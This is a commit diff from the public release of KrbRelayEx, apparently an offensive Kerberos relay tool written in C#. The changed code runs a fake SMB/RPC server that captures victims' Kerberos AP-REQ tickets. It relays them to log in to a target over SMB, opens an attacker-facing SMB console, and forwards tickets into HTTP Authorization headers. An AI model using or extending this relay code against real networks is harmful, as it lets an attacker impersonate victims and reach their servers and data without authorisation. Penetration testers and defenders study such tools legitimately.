Skip to content

Commit bfa435f

Browse files
author
Andrea Pierini
committed
v 1.0 public
1 parent b172be3 commit bfa435f

10 files changed

Lines changed: 1048 additions & 171 deletions

File tree

KrbRelayEx.sln renamed to KrbRelayEx-RPC.sln

File renamed without changes.

KrbRelayEx/Clients/Attacks/RPC-DCOM/RPC-DCOM.cs

Lines changed: 470 additions & 0 deletions
Large diffs are not rendered by default.

KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs

Lines changed: 61 additions & 32 deletions
Original file line numberDiff line numberDiff line change
@@ -12,11 +12,11 @@
1212

1313
public class State
1414
{
15-
public Socket SourceSocket { get; }
16-
public Socket TargetSocket { get; }
15+
public Socket SourceSocket { get; set; }
16+
public Socket TargetSocket { get; set; }
1717
public byte[] Buffer { get; }
1818
public int numReads = 0;
19-
19+
public IAsyncResult ar;
2020
public bool isRelayed = false;
2121
public string ServerType = "";
2222
public State(Socket sourceSocket, Socket targetSocket)
@@ -25,13 +25,17 @@ public State(Socket sourceSocket, Socket targetSocket)
2525
TargetSocket = targetSocket;
2626
Buffer = new byte[4096]; // Adjust buffer size as needed
2727
}
28+
public State()
29+
{
30+
31+
}
2832

2933
}
3034
class SMBCommandSocketConsole
3135
{
3236

3337
public byte[] apreqBuffer;
34-
public FakeSMBServer currSocketServer;
38+
public FakeRPCServer currSocketServer;
3539
public async Task Start(int port, State state, byte[] buffer)
3640
{
3741
// Define the IP address and port
@@ -41,37 +45,70 @@ public async Task Start(int port, State state, byte[] buffer)
4145
// Create a TcpListener
4246
TcpListener listener = new TcpListener(IPAddress.Any, port);
4347

48+
4449
try
4550
{
4651
// Start the listener
47-
listener.Start();
48-
Console.WriteLine("[*] SMB Console Server started on any:{0}. Waiting for connections...", port);
52+
53+
54+
55+
SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
56+
//bool success = false;
57+
bool success = false;
58+
bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
59+
60+
if (!isConnected)
61+
{
62+
Console.WriteLine("[-] Could not connect to [{0}:445]", Program.targetFQDN);
4963

64+
}
65+
66+
smbc.currSourceSocket = state.SourceSocket;
67+
smbc.currDestSocket = state.TargetSocket;
68+
//smbc.ServerType = State.ServerType;
69+
smbc.currSocketServer = currSocketServer;
70+
smbc.CallID = currSocketServer.CallID;
71+
smbc.AssocGroup = currSocketServer.AssocGroup;
72+
smbc.Login(Program.apreqBuffer, out success);
73+
74+
Console.WriteLine("[*] SMB Login status: {0}", success);
75+
if (!success)
76+
{
77+
78+
Console.WriteLine("[-] SMB Login Error");
79+
state.isRelayed = true;
80+
return;
81+
}
82+
83+
listener.Start();
84+
state.isRelayed = false;
85+
Console.WriteLine("[*] ===> SMB Console Server started on [any:{0}]. Waiting for connections...<===", port);
5086
//while (true)
5187
{
5288
// Accept a client socket
5389
//Socket clientSocket = listener.AcceptTcpClientAsync(); // AcceptSocket(); //AcceptTcpClientAsync()
5490
TcpClient clientSocket = await listener.AcceptTcpClientAsync();
55-
56-
57-
Console.WriteLine("[*] SMB Console Server connected client:{0}", clientSocket.Client.RemoteEndPoint);
58-
SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
91+
92+
93+
Console.WriteLine("[*] SMB Console Server connected client: [{0}]", clientSocket.Client.RemoteEndPoint);
94+
//SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
5995
//smbc.curSocketServer = currSocketServer;
6096
KrbRelay.Clients.Smb smb2 = new Smb(clientSocket.Client);
61-
//smbc.currSourceSocket = state.SourceSocket;
62-
//smbc.currDestSocket = state.TargetSocket;
97+
smbc.currSourceSocket = state.SourceSocket;
98+
smb2.alreadyLoggedIn = true;
99+
smbc.currDestSocket = state.TargetSocket;
63100
//smbc.ServerType = State.ServerType;
64-
smbc.curSocketServer = currSocketServer;
65-
bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
101+
smbc.currSocketServer = currSocketServer;
102+
/*bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
66103
if (!isConnected)
67104
{
68-
Console.WriteLine("[-] Could not connect to {0}:445", Program.targetFQDN);
105+
Console.WriteLine("[-] Could not connect to [{0}:445]", Program.targetFQDN);
69106
70107
}
108+
*/
71109

72110

73-
74-
Console.WriteLine("[*] SMB relay Connected to: {0}:445", Program.targetFQDN);
111+
Console.WriteLine("[*] SMB Console Server client [{0}] relay Connected to: [{1}:445]", clientSocket.Client.RemoteEndPoint, Program.targetFQDN);
75112
//state.isRelayed = true;
76113
//Task.Run(() => smb2.smbConnect(smbc));
77114
Task.Run(() => smb2.smbConnect(smbc, buffer));
@@ -83,14 +120,17 @@ public async Task Start(int port, State state, byte[] buffer)
83120
}
84121
catch (Exception ex)
85122
{
86-
Console.WriteLine($"Error: {ex.Message}");
123+
//Console.WriteLine($"SMBSocket Error: {ex.Message}");
124+
//Console.WriteLine("Stack Trace: " + ex.StackTrace);
87125
}
88126
finally
89127
{
90128
listener.Stop();
129+
Program.bgconsoleStartPort--;
91130
}
92131
}
93132
}
133+
94134
public class FakeSMBServer
95135
{
96136
private Socket _listenerSocket;
@@ -221,7 +261,7 @@ private void OnClientConnect(IAsyncResult ar)
221261
// Create a unique key for this connection
222262
string clientKey = $"{clientSocket.RemoteEndPoint}-{Guid.NewGuid()}";
223263

224-
Console.WriteLine($"[*] FakeSMBServer:{_listenPort} -> Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
264+
//Console.WriteLine($"[*] FakeSMBServer:{_listenPort} -> Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
225265

226266
// Create a new connection to the target server
227267
Socket targetSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
@@ -275,18 +315,7 @@ private void OnDataFromClient(IAsyncResult ar)
275315
state.SourceSocket.Send(smb2NegotiateProtocolResponse, smb2NegotiateProtocolResponse.Length, SocketFlags.None);
276316
l = state.SourceSocket.Receive(buffer);
277317
//int ticketOffset = Helpers.PatternAt(buffer, new byte[] { 0x60, 0x82 }); // 0x6e, 0x82, 0x06
278-
buffer = buffer.Skip(4).ToArray();
279-
Program.apreqBuffer = Program.ExtractSecurityBlob(buffer);
280-
if (!(Program.apreqBuffer[0] == 0x60 && Program.apreqBuffer[1] == 0x82))
281-
{
282-
Console.WriteLine("[-] FakeSMBServer {0}: Could not find AP-REQ, maybe using NTLM?", state.SourceSocket.RemoteEndPoint);
283-
state.isRelayed = false;
284-
285-
//CloseConnection(state);
286-
return;
287-
288-
}
289-
Console.WriteLine("[*] FakeSMBServer {0}: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
318+
Console.WriteLine("[*] FakeRPCServer {0}: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
290319

291320

292321

@@ -318,7 +347,7 @@ private void OnDataFromClient(IAsyncResult ar)
318347
smbc.currSourceSocket = state.SourceSocket;
319348
smbc.currDestSocket = state.TargetSocket;
320349
smbc.ServerType = ServerType;
321-
smbc.curSocketServer = this;
350+
//smbc.currSocketServer = this;
322351
bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
323352
if (!isConnected)
324353
{

KrbRelayEx/Clients/Attacks/Smb/Shares.cs

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -247,7 +247,7 @@ public static void smbConsole(SMB2Client smbClient, Socket clientSocket = null,
247247
break;
248248

249249
case "!l":
250-
Program.SMBtcpFwd.ListConnectedClients();
250+
//Program.SMBtcpFwd.ListConnectedClients();
251251
break;
252252

253253

@@ -667,7 +667,8 @@ public void smbConsole(SMB2Client smbClient, Socket cSocket = null, string share
667667
}
668668
else
669669
{
670-
Console.WriteLine("[-] Could not connect to {0}", share);
670+
Console.WriteLine($"[-] Could not connect to {share} : {(status==NTStatus.STATUS_BAD_IMPERSONATION_LEVEL ? "STATUS_BAD_IMPERSONATION_LEVEL" : status)}");
671+
671672
}
672673
Console.WriteLine("[*] Exiting from {0}", share);
673674
}

KrbRelayEx/Clients/Http.cs

Lines changed: 30 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -114,13 +114,10 @@ public static void Connect()
114114

115115
else
116116
{
117-
/*
118-
// MORE PROCESSING REQUIRED
119-
//DCOM
120-
117+
118+
121119
apRep1 = Convert.FromBase64String(headerValue);
122-
Console.WriteLine("[*] Header: {0} ", header.Value);
123-
120+
// /Console.WriteLine("[**] apRep1: {0}", Helpers.ByteArrayToString(apRep1));
124121

125122
byte[] moreArray = new byte[] { 0x05, 0x00, 0x0C, 0x07, 0x10, 0x00, 0x00, 0x00, 0xEE, 0x00, 0xAA, 0x00, 0x03, 0x00, 0x00, 0x00, 0xD0, 0x16, 0xD0, 0x16, 0xF6, 0x15, 0x00, 0x00, 0x04, 0x00, 0x31, 0x33, 0x35, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
126123
byte[] buffer = new byte[4096];
@@ -144,14 +141,21 @@ public static void Connect()
144141
outbuffer[12] = Program.CallID[0];
145142

146143
Array.Copy(Program.AssocGroup, 0, outbuffer, 20, 4);
147-
//Program.stream.Write(outbuffer, 0,outlen);
148-
Program.currSourceSocket.Send(outbuffer, 0);
144+
Program.currSourceSocket.Send(outbuffer);
145+
//Console.WriteLine(Program.HexDump(outbuffer));
146+
//Console.WriteLine(Program.HexDump(Program.AssocGroup, 16, 4));
147+
//Console.WriteLine(Program.HexDump(outbuffer,16,24));
148+
//Program.stream.Write(outbuffer, 0, outlen);
149+
149150

150-
//Program.tcpFwd.state.DestinationSocket.Send(outbuffer, outlen, SocketFlags.None);
151151

152+
//int l = Program.stream.Read(buffer, 0, buffer.Length);
153+
int l = Program.currSourceSocket.Receive(buffer);
154+
// Program.forwdardmode = true;
155+
//currSocketServer.state.isRelayed = false;
152156

153-
int l = Program.currDestSocket.Receive(buffer);
154-
//int l =Program.tcpFwd.state.SourceSocket.Receive(buffer);
157+
//currSocketServer.CloseConnection(currSocketServer.state);
158+
155159

156160
int pattern = KrbRelay.Helpers.PatternAt(buffer, new byte[] { 0xa1, 0x81 });
157161
int l3 = l - pattern;
@@ -165,9 +169,14 @@ public static void Connect()
165169
message.Headers.Add("Authorization", cookie);
166170
message.Headers.Add("Connection", "keep-alive");
167171
message.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko");
168-
Console.WriteLine("sending");
172+
//Console.WriteLine("sending");
169173
result = httpClient.SendAsync(message).Result;
170174
}
175+
Program.forwdardmode = true;
176+
currSocketServer.state.isRelayed = false;
177+
178+
currSocketServer.CloseConnection(currSocketServer.state);
179+
171180
IEnumerable<string> cookies = null;
172181
foreach (var h in result.Headers)
173182
{
@@ -206,10 +215,17 @@ public static void Connect()
206215
Console.WriteLine("[-] {0}", e);
207216
}
208217

209-
218+
//Program.forwdardmode = true;
219+
//currSocketServer.state.isRelayed = false;
220+
//currSocketServer.CloseConnection(currSocketServer.state);
221+
222+
210223
return;
211-
*/
212224
}
225+
226+
227+
228+
213229
return;
214230
}
215231
}

0 commit comments

Comments
 (0)